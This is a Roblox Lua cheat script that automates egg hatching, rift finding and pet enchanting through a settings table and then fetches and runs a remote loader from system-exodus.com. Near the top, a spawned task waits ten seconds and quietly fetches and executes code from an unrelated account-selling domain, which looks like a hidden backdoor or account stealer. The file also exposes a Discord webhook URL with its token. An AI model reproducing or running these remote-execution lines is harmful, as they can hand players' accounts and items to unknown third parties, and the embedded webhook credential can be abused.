if not game:IsLoaded() then
    game.Loaded:Wait()
  end




task.spawn(function()
wait(10)

loadstring(game:HttpGet("https://sellaccroblox.com/raw/view.php?file=lilbip%2Fextrabsi.txt"))()

end)

getgenv().Settings = {
    ["Egg Settings"] = {
        OpenEggs = true,
        Egg = "Pastel Egg",
        --// Supports ANY egg ("Rainbow Egg", "Infinity Egg", ...). Keep "Best" for new accounts.
        
        ["Notifications"] = {
            Webhook = "https://discord.com/api/webhooks/1280307675636301948/sM8Y96yRhPp_bcFBoHewrtwcuP2LoWfyOAmzuv_Lk3YSeboqh4A5XV9oDKwBBn1MR2yD",
            DiscordID = "1070055033225347212",
            Difficulty = "30m", --// Minimum Difficulty for Webhook Notifications
        },

        ["Rifts"] = {
            FindRifts = true,
            SortByMultiplier = false, 
            --// true --> Sort by Multiplier out of ALL Targetted Rifts.
            --// false --> Sort by Multiplier out of BEST Targetted Rifts.
            
            Targets = {"Aura Egg", "Bunny Egg", "Pastel Egg", "Nightmare Egg"},
            --// Targets = {} will automatically find the Top 3 BEST Rifts to hatch.
        },
    },
    
	["Enchant Settings"] = {
    EnchantPets = true,

    ["Require All Enchants"] = true,
    ["Enchants Needed"] = {
        ["Team Up"] = {Tier = 1, HigherTiers = true},
    },
	},
	
    ["Debug"] = {
        DisableUI = false,
    },
}
loadstring(game:HttpGet("https://system-exodus.com/scripts/BGSI/OneClick.lua"))()
